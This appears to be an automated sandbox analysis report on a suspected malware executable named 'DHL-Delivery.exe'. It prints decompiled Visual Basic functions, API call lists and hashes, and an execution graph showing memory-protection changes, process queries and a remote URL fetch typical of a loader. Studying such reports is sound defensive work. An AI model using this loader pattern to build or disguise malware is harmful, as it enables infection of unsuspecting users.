				L004012BA();
				asm("wait");
				_push(0x411142);
				L004012D8();
				L00401314();
				return _t88;
			}





































                        0x00410f15
                        0x00410f18
                        0x00410f27
                        0x00410f33
                        0x00410f3b
                        0x00410f3e
                        0x00410f45
                        0x00410f54
                        0x00410f5d
                        0x00410f68
                        0x00410f74
                        0x00410f8e
                        0x00410f76
                        0x00410f76
                        0x00410f7b
                        0x00410f80
                        0x00410f85
                        0x00410f85
                        0x00410fa9
                        0x00410fad
                        0x00410fb2
                        0x00410fc1
                        0x00410fc7
                        0x00410fc9
                        0x00410fd0
                        0x00410fef
                        0x00410fd2
                        0x00410fd2
                        0x00410fd7
                        0x00410fdc
                        0x00410fdf
                        0x00410fe2
                        0x00410fe7
                        0x00410fe7
                        0x00410ffd
                        0x0041101a
                        0x00410fff
                        0x00410fff
                        0x00411004
                        0x00411009
                        0x0041100e
                        0x0041100e
                        0x00411034
                        0x0041103e
                        0x00411042
                        0x00411047
                        0x0041104a
                        0x00411051
                        0x00411058
                        0x0041105f
                        0x00411066
                        0x0041106d
                        0x00411077
                        0x00411081
                        0x00411082
                        0x00411083
                        0x00411084
                        0x00411088
                        0x00411092
                        0x00411093
                        0x00411094
                        0x00411095
                        0x00411099
                        0x004110a3
                        0x004110a4
                        0x004110a5
                        0x004110a6
                        0x004110ab
                        0x004110b1
                        0x004110b7
                        0x004110c4
                        0x004110cf
                        0x004110d5
                        0x004110d7
                        0x004110de
                        0x004110fd
                        0x004110e0
                        0x004110e0
                        0x004110e5
                        0x004110ea
                        0x004110ed
                        0x004110f0
                        0x004110f5
                        0x004110f5
                        0x00411107
                        0x00411108
                        0x0041110b
                        0x0041110c
                        0x0041110e
                        0x00411116
                        0x00411117
                        0x00411134
                        0x0041113c
                        0x00411141

                        APIs
                        • __vbaChkstk.MSVBVM60(?,004011D6), ref: 00410F33
                        • __vbaStrCopy.MSVBVM60(?,?,?,?,004011D6), ref: 00410F5D
                        • __vbaVarDup.MSVBVM60(?,?,?,?,004011D6), ref: 00410F68
                        • __vbaNew2.MSVBVM60(0040E9A0,00412010,?,?,?,?,004011D6), ref: 00410F80
                        • __vbaObjSet.MSVBVM60(?,00000000), ref: 00410FAD
                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040E6F8,000000D8), ref: 00410FE2
                        • __vbaNew2.MSVBVM60(0040E9A0,00412010), ref: 00411009
                        • __vbaObjSet.MSVBVM60(?,00000000), ref: 00411042
                        • __vbaChkstk.MSVBVM60(?,00000000), ref: 00411077
                        • __vbaChkstk.MSVBVM60(?,00000000), ref: 00411088
                        • __vbaChkstk.MSVBVM60(?,00000000), ref: 00411099
                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040E6B4,00000224,?,?,00000000), ref: 004110F0
                        • __vbaFreeObjList.MSVBVM60(00000002,?,?,?,?,00000000), ref: 0041110E
                        • __vbaFreeVar.MSVBVM60(00411142,?,?,004011D6), ref: 00411134
                        • __vbaFreeStr.MSVBVM60(00411142,?,?,004011D6), ref: 0041113C
                        Memory Dump Source
                        • Source File: 00000000.00000002.1737661283.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1737628367.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.1737748460.0000000000412000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.1737789454.0000000000413000.00000002.00020000.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: __vba$Chkstk$Free$CheckHresultNew2$CopyList
                        • String ID:
                        • API String ID: 3169856408-0
                        • Opcode ID: 027f098705b9b880d8ec3fa40b53142c158e182d209b448ff24dbf66faa871b5
                        • Instruction ID: 318ca39a6a55ff594d7475d310148ad5199da1e9b753c8aa78ed879678017c84
                        • Opcode Fuzzy Hash: 027f098705b9b880d8ec3fa40b53142c158e182d209b448ff24dbf66faa871b5
                        • Instruction Fuzzy Hash: 86514670900218EFCB10DFA1C885BDDBBB5BF08304F2044AAF605BB2A1CBB95995DF59
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 0041092D, Relevance: 22.6, APIs: 15, Instructions: 107UNIQUE
                        Download Yara Rule
                        C-Code - Quality: 56%
                        			E0041092D(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v48;
				void* _v52;
				char _v56;
				intOrPtr _v64;
				char _v72;
				char _v88;
				intOrPtr _v96;
				char _v104;
				void* _v124;
				signed int _v128;
				intOrPtr* _v140;
				signed int _v144;
				intOrPtr _t47;
				char* _t49;
				short _t51;
				signed int _t55;
				char* _t59;
				void* _t75;
				void* _t77;
				intOrPtr _t78;

				_t78 = _t77 - 0xc;
				 *[fs:0x0] = _t78;
				L004011D0();
				_v16 = _t78;
				_v12 = 0x401170;
				_v8 = 0;
				_t47 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x78,  *[fs:0x0], 0x4011d6, _t75);
				L004012DE();
				_push(0x40e6b0);
				_push(0x40e794);
				L0040131A();
				L00401320();
				_push(_t47);
				_push(0x40e794);
				L0040131A();
				_v64 = _t47;
				_v72 = 8;
				_push( &_v72);
				_t49 =  &_v88;
				_push(_t49);
				L00401272();
				_push(0x40e794);
				_push(0x40e794);
				L0040131A();
				_v96 = _t49;
				_v104 = 0x8008;
				_push( &_v88);
				_t51 =  &_v104;
				_push(_t51);
				L004012FC();
				_v124 = _t51;
				L00401314();
				_push( &_v104);
				_push( &_v88);
				_push( &_v72);
				_push(3);
				L0040130E();
				_t55 = _v124;
				if(_t55 != 0) {
					if( *0x412010 != 0) {
						_v140 = 0x412010;
					} else {
						_push(0x412010);
						_push(0x40e9a0);
						L004012C6();
						_v140 = 0x412010;
					}
					_t59 =  &_v56;
					L004012CC();
					_v124 = _t59;
					_t55 =  *((intOrPtr*)( *_v124 + 0x1c4))(_v124, _t59,  *((intOrPtr*)( *((intOrPtr*)( *_v140)) + 0x310))( *_v140));
					asm("fclex");
					_v128 = _t55;
					if(_v128 >= 0) {
						_v144 = _v144 & 0x00000000;
					} else {
						_push(0x1c4);
						_push(0x40e6f8);
						_push(_v124);
						_push(_v128);
						L004012C0();
						_v144 = _t55;
					}
					L004012A8();
				}
				_push(0x410adb);
				L004012D8();
				return _t55;
			}


























                        0x00410930
                        0x0041093f
                        0x00410949
                        0x00410951
                        0x00410954
                        0x0041095b
                        0x0041096a
                        0x00410973
                        0x00410978
                        0x0041097d
                        0x00410982
                        0x0041098c
                        0x00410991
                        0x00410992
                        0x00410997
                        0x0041099c
                        0x0041099f
                        0x004109a9
                        0x004109aa
                        0x004109ad
                        0x004109ae
                        0x004109b3
                        0x004109b8
                        0x004109bd
                        0x004109c2
                        0x004109c5
                        0x004109cf
                        0x004109d0
                        0x004109d3
                        0x004109d4
                        0x004109d9
                        0x004109e0
                        0x004109e8
                        0x004109ec
                        0x004109f0
                        0x004109f1
                        0x004109f3
                        0x004109fb
                        0x00410a01
                        0x00410a0e
                        0x00410a2b
                        0x00410a10
                        0x00410a10
                        0x00410a15
                        0x00410a1a
                        0x00410a1f
                        0x00410a1f
                        0x00410a4f
                        0x00410a53
                        0x00410a58
                        0x00410a63
                        0x00410a69
                        0x00410a6b
                        0x00410a72
                        0x00410a91
                        0x00410a74
                        0x00410a74
                        0x00410a79
                        0x00410a7e
                        0x00410a81
                        0x00410a84
                        0x00410a89
                        0x00410a89
                        0x00410a9b
                        0x00410a9b
                        0x00410aa0
                        0x00410ad5
                        0x00410ada

                        APIs
                        • __vbaChkstk.MSVBVM60(?,004011D6), ref: 00410949
                        • __vbaVarDup.MSVBVM60(?,?,?,?,004011D6), ref: 00410973
                        • __vbaStrCat.MSVBVM60(0040E794,0040E6B0,?,?,?,?,004011D6), ref: 00410982
                        • __vbaStrMove.MSVBVM60(0040E794,0040E6B0,?,?,?,?,004011D6), ref: 0041098C
                        • __vbaStrCat.MSVBVM60(0040E794,00000000,0040E794,0040E6B0,?,?,?,?,004011D6), ref: 00410997
                        • #520.MSVBVM60(?,00000008), ref: 004109AE
                        • __vbaStrCat.MSVBVM60(0040E794,0040E794,?,00000008), ref: 004109BD
                        • __vbaVarTstEq.MSVBVM60(00008008,?,?,?,?,?,0040E794,0040E794,?,00000008), ref: 004109D4
                        • __vbaFreeStr.MSVBVM60(00008008,?,?,?,?,?,0040E794,0040E794,?,00000008), ref: 004109E0
                        • __vbaFreeVarList.MSVBVM60(00000003,00000008,?,00008008,00008008,?,?,?,?,?,0040E794,0040E794,?,00000008), ref: 004109F3
                        • __vbaNew2.MSVBVM60(0040E9A0,00412010,?,?,?,004011D6), ref: 00410A1A
                        • __vbaObjSet.MSVBVM60(?,00000000), ref: 00410A53
                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040E6F8,000001C4), ref: 00410A84
                        • __vbaFreeObj.MSVBVM60(00000000,?,0040E6F8,000001C4), ref: 00410A9B
                        • __vbaFreeVar.MSVBVM60(00410ADB,?,?,?,004011D6), ref: 00410AD5
                        Memory Dump Source
                        • Source File: 00000000.00000002.1737661283.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1737628367.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.1737748460.0000000000412000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.1737789454.0000000000413000.00000002.00020000.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: __vba$Free$#520CheckChkstkHresultListMoveNew2
                        • String ID:
                        • API String ID: 317386380-0
                        • Opcode ID: 424836248bb3552e55d5bbb29d5d4f96e23778803c54b028c73562d047ccf534
                        • Instruction ID: c4b3025b7bd781c1e4f3ff50fc6e1a75ad06e6a32777ad2f26da1def70e87cce
                        • Opcode Fuzzy Hash: 424836248bb3552e55d5bbb29d5d4f96e23778803c54b028c73562d047ccf534
                        • Instruction Fuzzy Hash: F6412A70900208ABDB10EFA1C945FDD7BB8AF08704F20846AF505FB1A1DBB85A89CF59
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 00410D54, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 102UNIQUE
                        Download Yara Rule
                        C-Code - Quality: 55%
                        			E00410D54(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v24;
				void* _v40;
				void* _v44;
				intOrPtr _v52;
				char _v60;
				char _v76;
				intOrPtr _v116;
				char _v124;
				char _v128;
				void* _v132;
				signed int _v136;
				intOrPtr* _v140;
				signed int _v144;
				char _v152;
				signed int _v156;
				signed int _v160;
				short _t54;
				signed int _t57;
				signed int _t63;
				intOrPtr _t79;

				_push(0x4011d6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t79;
				L004011D0();
				_v12 = _t79;
				_v8 = 0x4011a0;
				L004012DE();
				_v52 = 9;
				_v60 = 2;
				_push( &_v60);
				_push( &_v76);
				L0040126C();
				_v116 = 0xb;
				_v124 = 0x8002;
				_push( &_v76);
				_t54 =  &_v124;
				_push(_t54);
				L004012FC();
				_v132 = _t54;
				_push( &_v76);
				_push( &_v60);
				_push(2);
				L0040130E();
				_t57 = _v132;
				if(_t57 != 0) {
					if( *0x412464 != 0) {
						_v152 = 0x412464;
					} else {
						_push(0x412464);
						_push(0x40e770);
						L004012C6();
						_v152 = 0x412464;
					}
					_t19 =  &_v152; // 0x412464
					_v132 =  *((intOrPtr*)( *_t19));
					_t63 =  *((intOrPtr*)( *_v132 + 0x14))(_v132,  &_v44);
					asm("fclex");
					_v136 = _t63;
					if(_v136 >= 0) {
						_v156 = _v156 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x40e760);
						_push(_v132);
						_push(_v136);
						L004012C0();
						_v156 = _t63;
					}
					_v140 = _v44;
					_t57 =  *((intOrPtr*)( *_v140 + 0x118))(_v140,  &_v128);
					asm("fclex");
					_v144 = _t57;
					if(_v144 >= 0) {
						_v160 = _v160 & 0x00000000;
					} else {
						_push(0x118);
						_push(0x40e7b8);
						_push(_v140);
						_push(_v144);
						L004012C0();
						_v160 = _t57;
					}
					L00401266();
					_v24 = _t57;
					L004012A8();
				}
				_push(0x410f02);
				L004012D8();
				return _t57;
			}

























                        0x00410d59
                        0x00410d64
                        0x00410d65
                        0x00410d71
                        0x00410d79
                        0x00410d7c
                        0x00410d89
                        0x00410d8e
                        0x00410d95
                        0x00410d9f
                        0x00410da3
                        0x00410da4
                        0x00410da9
                        0x00410db0
                        0x00410dba
                        0x00410dbb
                        0x00410dbe
                        0x00410dbf
                        0x00410dc4
                        0x00410dcb
                        0x00410dcf
                        0x00410dd0
                        0x00410dd2
                        0x00410dda
                        0x00410de0
                        0x00410ded
                        0x00410e0a
                        0x00410def
                        0x00410def
                        0x00410df4
                        0x00410df9
                        0x00410dfe
                        0x00410dfe
                        0x00410e14
                        0x00410e1c
                        0x00410e2b
                        0x00410e2e
                        0x00410e30
                        0x00410e3d
                        0x00410e5c
                        0x00410e3f
                        0x00410e3f
                        0x00410e41
                        0x00410e46
                        0x00410e49
                        0x00410e4f
                        0x00410e54
                        0x00410e54
                        0x00410e66
                        0x00410e7e
                        0x00410e84
                        0x00410e86
                        0x00410e93
                        0x00410eb8
                        0x00410e95
                        0x00410e95
                        0x00410e9a
                        0x00410e9f
                        0x00410ea5
                        0x00410eab
                        0x00410eb0
                        0x00410eb0
                        0x00410ec2
                        0x00410ec7
                        0x00410ece
                        0x00410ece
                        0x00410ed3
                        0x00410efc
                        0x00410f01

                        APIs
                        • __vbaChkstk.MSVBVM60(?,004011D6), ref: 00410D71
                        • __vbaVarDup.MSVBVM60(?,?,?,?,004011D6), ref: 00410D89
                        • #575.MSVBVM60(?,00000002,?,?,?,?,?,?,?,?,?,?,?,004011D6), ref: 00410DA4
                        • __vbaVarTstEq.MSVBVM60(00008002,?), ref: 00410DBF
                        • __vbaFreeVarList.MSVBVM60(00000002,00000002,?,00008002,?), ref: 00410DD2
                        • __vbaNew2.MSVBVM60(0040E770,00412464), ref: 00410DF9
                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040E760,00000014), ref: 00410E4F
                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040E7B8,00000118), ref: 00410EAB
                        • __vbaI2I4.MSVBVM60(00000000,?,0040E7B8,00000118), ref: 00410EC2
                        • __vbaFreeObj.MSVBVM60(00000000,?,0040E7B8,00000118), ref: 00410ECE
                        • __vbaFreeVar.MSVBVM60(00410F02), ref: 00410EFC
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1737661283.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1737628367.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.1737748460.0000000000412000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.1737789454.0000000000413000.00000002.00020000.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: __vba$Free$CheckHresult$#575ChkstkListNew2
                        • String ID: d$A
                        • API String ID: 360704243-1085024846
                        • Opcode ID: ef63ead78961bfb15b7ad3708dc31e43a80c1ab66d0aa745806fa78e5420dbc6
                        • Instruction ID: fef7fcc809705b90fed205971758a989953b93a4b9bc8cf40fce2cbde63bd8be
                        • Opcode Fuzzy Hash: ef63ead78961bfb15b7ad3708dc31e43a80c1ab66d0aa745806fa78e5420dbc6
                        • Instruction Fuzzy Hash: 1D41FA71900218DFDB10DFA5C986BDDBBB8FF08704F1084AAE105B72A1DBB85A959F64
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 00410B08, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 90UNIQUE
                        Download Yara Rule
                        C-Code - Quality: 51%
                        			E00410B08(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a44, void* _a60) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v36;
				void* _v52;
				void* _v60;
				intOrPtr _v68;
				intOrPtr _v76;
				intOrPtr* _v80;
				signed int _v84;
				intOrPtr* _v88;
				signed int _v92;
				char _v100;
				signed int _v104;
				signed int _v108;
				signed int _t47;
				signed int _t52;
				intOrPtr _t68;

				_push(0x4011d6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t68;
				_push(0x58);
				L004011D0();
				_v12 = _t68;
				_v8 = 0x401180;
				L004012DE();
				L004012DE();
				if( *0x412464 != 0) {
					_v100 = 0x412464;
				} else {
					_push(0x412464);
					_push(0x40e770);
					L004012C6();
					_v100 = 0x412464;
				}
				_t9 =  &_v100; // 0x412464
				_v80 =  *((intOrPtr*)( *_t9));
				_t47 =  *((intOrPtr*)( *_v80 + 0x14))(_v80,  &_v60);
				asm("fclex");
				_v84 = _t47;
				if(_v84 >= 0) {
					_v104 = _v104 & 0x00000000;
				} else {
					_push(0x14);
					_push(0x40e760);
					_push(_v80);
					_push(_v84);
					L004012C0();
					_v104 = _t47;
				}
				_v88 = _v60;
				_v68 = 0x80020004;
				_v76 = 0xa;
				L004011D0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t52 =  *((intOrPtr*)( *_v88 + 0x13c))(_v88, L"DUMMYSPILLER", 0x10);
				asm("fclex");
				_v92 = _t52;
				if(_v92 >= 0) {
					_v108 = _v108 & 0x00000000;
				} else {
					_push(0x13c);
					_push(0x40e7b8);
					_push(_v88);
					_push(_v92);
					L004012C0();
					_v108 = _t52;
				}
				L004012A8();
				_push(0x410c3a);
				L004012D8();
				L004012D8();
				return _t52;
			}




















                        0x00410b0d
                        0x00410b18
                        0x00410b19
                        0x00410b20
                        0x00410b23
                        0x00410b2b
                        0x00410b2e
                        0x00410b3b
                        0x00410b46
                        0x00410b52
                        0x00410b6c
                        0x00410b54
                        0x00410b54
                        0x00410b59
                        0x00410b5e
                        0x00410b63
                        0x00410b63
                        0x00410b73
                        0x00410b78
                        0x00410b87
                        0x00410b8a
                        0x00410b8c
                        0x00410b93
                        0x00410bac
                        0x00410b95
                        0x00410b95
                        0x00410b97
                        0x00410b9c
                        0x00410b9f
                        0x00410ba2
                        0x00410ba7
                        0x00410ba7
                        0x00410bb3
                        0x00410bb6
                        0x00410bbd
                        0x00410bc7
                        0x00410bd1
                        0x00410bd2
                        0x00410bd3
                        0x00410bd4
                        0x00410be2
                        0x00410be8
                        0x00410bea
                        0x00410bf1
                        0x00410c0d
                        0x00410bf3
                        0x00410bf3
                        0x00410bf8
                        0x00410bfd
                        0x00410c00
                        0x00410c03
                        0x00410c08
                        0x00410c08
                        0x00410c14
                        0x00410c19
                        0x00410c2c
                        0x00410c34
                        0x00410c39

                        APIs
                        • __vbaChkstk.MSVBVM60(?,004011D6), ref: 00410B23
                        • __vbaVarDup.MSVBVM60(?,?,?,?,004011D6), ref: 00410B3B
                        • __vbaVarDup.MSVBVM60(?,?,?,?,004011D6), ref: 00410B46
                        • __vbaNew2.MSVBVM60(0040E770,00412464,?,?,?,?,004011D6), ref: 00410B5E
                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040E760,00000014), ref: 00410BA2
                        • __vbaChkstk.MSVBVM60 ref: 00410BC7
                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040E7B8,0000013C), ref: 00410C03
                        • __vbaFreeObj.MSVBVM60 ref: 00410C14
                        • __vbaFreeVar.MSVBVM60(00410C3A), ref: 00410C2C
                        • __vbaFreeVar.MSVBVM60(00410C3A), ref: 00410C34
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1737661283.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1737628367.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.1737748460.0000000000412000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.1737789454.0000000000413000.00000002.00020000.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: __vba$Free$CheckChkstkHresult$New2
                        • String ID: DUMMYSPILLER$d$A
                        • API String ID: 2652103358-1556165036
                        • Opcode ID: c2a1af7a994a0030077b79652a03899cd34e97ea2d94661043fd18a297dbce0d
                        • Instruction ID: ac648971a3376c084c7d279ba8f58a3cd88c05a30a3448b3089f2d999351de43
                        • Opcode Fuzzy Hash: c2a1af7a994a0030077b79652a03899cd34e97ea2d94661043fd18a297dbce0d
                        • Instruction Fuzzy Hash: E531DE70910248EFDB14EF96C946BDDBBB5BF08708F10442AF501BB2A1D7B82995CB58
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 00411161, Relevance: 13.5, APIs: 9, Instructions: 39UNIQUE
                        Download Yara Rule
                        C-Code - Quality: 62%
                        			E00411161(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a20, void* _a36) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				void* _v40;
				void* _v44;
				void* _t12;
				intOrPtr _t28;

				_push(0x4011d6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t28;
				_t12 = 0x1c;
				L004011D0();
				_v12 = _t28;
				_v8 = 0x4011c0;
				L004012A2();
				L004012DE();
				_push(0x40e7cc);
				_push(0x40e7cc);
				L0040131A();
				L00401320();
				_push(_t12);
				L00401260();
				L00401314();
				_push(0x4111ec);
				L00401314();
				L004012D8();
				return _t12;
			}










                        0x00411166
                        0x00411171
                        0x00411172
                        0x0041117b
                        0x0041117c
                        0x00411184
                        0x00411187
                        0x00411194
                        0x0041119f
                        0x004111a4
                        0x004111a9
                        0x004111ae
                        0x004111b8
                        0x004111bd
                        0x004111be
                        0x004111c6
                        0x004111cb
                        0x004111de
                        0x004111e6
                        0x004111eb

                        APIs
                        • __vbaChkstk.MSVBVM60(?,004011D6), ref: 0041117C
                        • __vbaStrCopy.MSVBVM60(?,?,?,?,004011D6), ref: 00411194
                        • __vbaVarDup.MSVBVM60(?,?,?,?,004011D6), ref: 0041119F
                        • __vbaStrCat.MSVBVM60(0040E7CC,0040E7CC,?,?,?,?,004011D6), ref: 004111AE
                        • __vbaStrMove.MSVBVM60(0040E7CC,0040E7CC,?,?,?,?,004011D6), ref: 004111B8
                        • #530.MSVBVM60(00000000,0040E7CC,0040E7CC,?,?,?,?,004011D6), ref: 004111BE
                        • __vbaFreeStr.MSVBVM60(00000000,0040E7CC,0040E7CC,?,?,?,?,004011D6), ref: 004111C6
                        • __vbaFreeStr.MSVBVM60(004111EC,00000000,0040E7CC,0040E7CC,?,?,?,?,004011D6), ref: 004111DE
                        • __vbaFreeVar.MSVBVM60(004111EC,00000000,0040E7CC,0040E7CC,?,?,?,?,004011D6), ref: 004111E6
                        Memory Dump Source
                        • Source File: 00000000.00000002.1737661283.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1737628367.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.1737748460.0000000000412000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.1737789454.0000000000413000.00000002.00020000.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: __vba$Free$#530ChkstkCopyMove
                        • String ID:
                        • API String ID: 409351841-0
                        • Opcode ID: 4f794aad8005d9ab83d62d2e65640dd88a5b1a60d8a1f24d638e0ba262577e9f
                        • Instruction ID: 4cb86aa9483644db274db78c576c34a738887bb7daa32ce1e93ace9c00515eec
                        • Opcode Fuzzy Hash: 4f794aad8005d9ab83d62d2e65640dd88a5b1a60d8a1f24d638e0ba262577e9f
                        • Instruction Fuzzy Hash: DD012831900209AADB04EB93C943EDEB778AB18B48F60446EB501775E1DA786A0586A8
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 00410C55, Relevance: 7.6, APIs: 5, Instructions: 61UNIQUE
                        Download Yara Rule
                        C-Code - Quality: 66%
                        			E00410C55(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v32;
				intOrPtr* _v36;
				signed int _v40;
				intOrPtr* _v52;
				signed int _v56;
				char* _t33;
				signed int _t36;
				void* _t44;
				void* _t46;
				intOrPtr _t47;

				_t47 = _t46 - 0xc;
				 *[fs:0x0] = _t47;
				L004011D0();
				_v16 = _t47;
				_v12 = 0x401190;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x20,  *[fs:0x0], 0x4011d6, _t44);
				if( *0x412010 != 0) {
					_v52 = 0x412010;
				} else {
					_push(0x412010);
					_push(0x40e9a0);
					L004012C6();
					_v52 = 0x412010;
				}
				_t33 =  &_v32;
				L004012CC();
				_v36 = _t33;
				_t36 =  *((intOrPtr*)( *_v36 + 0x22c))(_v36, _t33,  *((intOrPtr*)( *((intOrPtr*)( *_v52)) + 0x304))( *_v52));
				asm("fclex");
				_v40 = _t36;
				if(_v40 >= 0) {
					_v56 = _v56 & 0x00000000;
				} else {
					_push(0x22c);
					_push(0x40e6b4);
					_push(_v36);
					_push(_v40);
					L004012C0();
					_v56 = _t36;
				}
				L004012A8();
				_push(0x410d2d);
				return _t36;
			}
















                        0x00410c58
                        0x00410c67
                        0x00410c71
                        0x00410c79
                        0x00410c7c
                        0x00410c83
                        0x00410c92
                        0x00410c9c
                        0x00410cb6
                        0x00410c9e
                        0x00410c9e
                        0x00410ca3
                        0x00410ca8
                        0x00410cad
                        0x00410cad
                        0x00410cd1
                        0x00410cd5
                        0x00410cda
                        0x00410ce5
                        0x00410ceb
                        0x00410ced
                        0x00410cf4
                        0x00410d10
                        0x00410cf6
                        0x00410cf6
                        0x00410cfb
                        0x00410d00
                        0x00410d03
                        0x00410d06
                        0x00410d0b
                        0x00410d0b
                        0x00410d17
                        0x00410d1c
                        0x00000000

                        APIs
                        • __vbaChkstk.MSVBVM60(?,004011D6), ref: 00410C71
                        • __vbaNew2.MSVBVM60(0040E9A0,00412010,?,?,?,?,004011D6), ref: 00410CA8
                        • __vbaObjSet.MSVBVM60(?,00000000), ref: 00410CD5
                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040E6B4,0000022C), ref: 00410D06
                        • __vbaFreeObj.MSVBVM60 ref: 00410D17
                        Memory Dump Source
                        • Source File: 00000000.00000002.1737661283.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1737628367.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.1737748460.0000000000412000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.1737789454.0000000000413000.00000002.00020000.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: __vba$CheckChkstkFreeHresultNew2
                        • String ID:
                        • API String ID: 4127847336-0
                        • Opcode ID: 39ba9c7af6e8c22363db470fde4a21d854952ad7a012dacb62282482d9e336fd
                        • Instruction ID: 9224f88870c14887c820cadec0ac31f95736c34fd9e95cd02b83149658af814e
                        • Opcode Fuzzy Hash: 39ba9c7af6e8c22363db470fde4a21d854952ad7a012dacb62282482d9e336fd
                        • Instruction Fuzzy Hash: 4321E474A00208AFCB00EFA5D949BDDBBB5BB08704F20456AF501BB2A1D7B96990DB59
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Analysis Process: DHL-Delivery.exe PID: 892 Parent PID: 5880 DHL-Delivery.exeUNIQUE

                        Execution Graph

                        Execution Coverage:0.1%
                        Dynamic/Decrypted Code Coverage:100%
                        Signature Coverage:0%
                        Total number of Nodes:58
                        Total number of Limit Nodes:10

                        Graph

                        execution_graph 92596 1e120610 92598 1e12061a 92596->92598 92599 1e12062f LdrInitializeThunk 92598->92599 92600 1e120621 92598->92600 92601 56a407 NtProtectVirtualMemory 92608 56b283 92609 56b29f 92608->92609 92610 56b310 92609->92610 92611 56b2c9 NtQueryInformationProcess 92609->92611 92613 5683ac 92609->92613 92611->92613 92612 5684db LoadLibraryA 92614 5684ec __common_dcos_data 92612->92614 92613->92610 92613->92612 92621 568b71 GetPEB __common_dcos_data 92613->92621 92616 56841b 92619 56847d __common_dcos_data 92616->92619 92622 568b71 GetPEB __common_dcos_data 92616->92622 92618 568441 92618->92619 92623 568b71 GetPEB __common_dcos_data 92618->92623 92619->92612 92621->92616 92622->92618 92623->92619 92624 563a0a 92625 563a13 TerminateThread 92624->92625 92627 5683ac 92625->92627 92636 563a3e __common_dcos_data 92625->92636 92628 5684db LoadLibraryA 92627->92628 92637 568b71 GetPEB __common_dcos_data 92627->92637 92629 5684ec __common_dcos_data 92628->92629 92631 56841b 92634 56847d __common_dcos_data 92631->92634 92638 568b71 GetPEB __common_dcos_data 92631->92638 92633 568441 92633->92634 92639 568b71 GetPEB __common_dcos_data 92633->92639 92634->92628 92637->92631 92638->92633 92639->92634 92640 565a48 InternetOpenUrlA 92641 565d1c 92640->92641 92643 565a7f 92640->92643 92643->92641 92644 565c5d 92643->92644 92649 56ab16 92643->92649 92645 56ab16 3 API calls 92644->92645 92646 565c98 92645->92646 92647 56ab16 3 API calls 92646->92647 92648 565cdb 92647->92648 92650 56ab38 92649->92650 92652 5683ac GetPEB LoadLibraryA NtQueryInformationProcess __common_dcos_data 92650->92652 92657 565870 92658 56588b 